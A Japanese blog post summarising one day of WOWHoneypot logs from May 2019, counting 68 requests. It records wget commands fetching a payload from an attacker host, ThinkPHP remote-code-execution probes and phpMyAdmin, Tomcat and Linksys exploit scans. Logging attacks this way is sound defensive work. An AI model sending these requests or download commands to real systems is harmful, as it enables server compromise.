23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(64日目)

2019/05/19(日)

トータルは68件です。

ハンティングログは以下です。

5.138.234.59 wget+hxxp://hulo.r00ts.online/.configs/Lrep
41.32.246.178 wget+hxxp://hulo.r00ts.online/.configs/Lrep
116.4.97.161 wget+hxxp://hulo.r00ts.online/.config/Lrep
223.79.108.106 wget+hxxp://hulo.r00ts.online/.configs/Lrep

www.virustotal.com


件数 概要 リクエス
42 アクセス GET /
4 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
4 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ZmEuによる調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 ZmEuによるphpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 Spring Data Commonsの脆弱性(CVE-2018-1273)を狙った通信 POST /users?page=&size=5
1 調査 HEAD /
1 ZmEuによるphpMyAdminの調査 GET /pma/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /myadmin/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /MyAdmin/scripts/setup.php
1 不正中継の調査 HEAD hxxp://112.124.42.80:63435/
1 クローリング HEAD /robots.txt